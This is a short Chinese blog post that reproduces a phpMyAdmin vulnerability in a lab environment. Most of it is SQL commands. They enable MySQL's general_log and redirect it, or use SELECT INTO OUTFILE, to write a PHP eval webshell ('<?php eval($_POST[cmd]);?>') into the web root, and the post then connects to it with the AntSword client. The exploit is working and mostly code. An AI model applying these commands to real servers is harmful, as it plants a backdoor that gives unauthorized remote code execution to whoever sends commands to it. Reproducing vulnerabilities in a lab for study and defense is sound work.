PhPMyadmin-cms漏洞复现

cr.sheeper2024-12-29 20:11

一.通过日志文件拿Shell

打开靶场连接数据库

来到sql中输入

复制代码 
show global variables like '%general%';
复制代码 
set global general_log='on'; //⽇志保存状态开启;
复制代码 
set global general_log_file = 'D:/phpstudy/phpstudy_pro/WWW/123.php'  //修改日志保存位置
复制代码 
show global variables like '%general%';
复制代码 
select '<?php eval($_POST[cmd]);?>';

看看是否能连接成功

二.导入导出拿webshell

输入select @@datadir我们可以看到mysql路径

所以我们推测web路径为D:/phpstudy/phpstudy_pro/WWW

复制代码 
select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy/phpstudy_pro/WWW/666.php'

去访问

再用蚁剑连接一下试试

相关推荐
枫眠QAQ11 小时前
hackthebox Cicada靶机
安全·web安全·网络安全
unable code12 小时前
磁盘取证-[第十章][10.1.2 磁盘取证方法]磁盘取证1
网络安全·ctf·misc·1024程序员节·内存取证
啥都想学点12 小时前
kali 基础介绍(CredentialAccess——凭证访问)
安全·网络安全
qife12212 小时前
CVE-2026-21962漏洞利用工具:Oracle WebLogic代理插件未授权RCE检测与利用
数据库·网络安全·oracle·渗透测试·weblogic·cve-2026-21962
大方子14 小时前
【PolarCTF】bluetooth test
网络安全·polarctf
LuminescenceJ15 小时前
GoEdge 开源CDN 架构设计与工作原理分析
分布式·后端·网络协议·网络安全·rpc·开源·信息与通信
大方子18 小时前
【PolarCTF】$$
网络安全·polarctf
大方子19 小时前
【PolarCTF】LSB
网络安全·polarctf
浩浩测试一下19 小时前
应急响应之 洪水 Floods attack ==== DDOS
安全·web安全·网络安全·系统安全·ddos·安全架构
大方子20 小时前
【PolarCTF】超级简单的流量
网络安全·polarctf
热门推荐
01GitHub 镜像站点02OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)03Clawdbot 中文汉化版 接入微信、飞书04一种新的LCA算法05Claude Code Skills 实用使用手册06【网络安全测试】Burp Suite工具使用说明、配置及常见问题(有关必回)07在Trae中使用Pencil MCP08零门槛部署本地 AI 助手:Clawdbot/Meltbot 部署深度保姆级教程09UV安装并设置国内源10struts2 XML外部实体注入漏洞复现(CVE-2025-68493)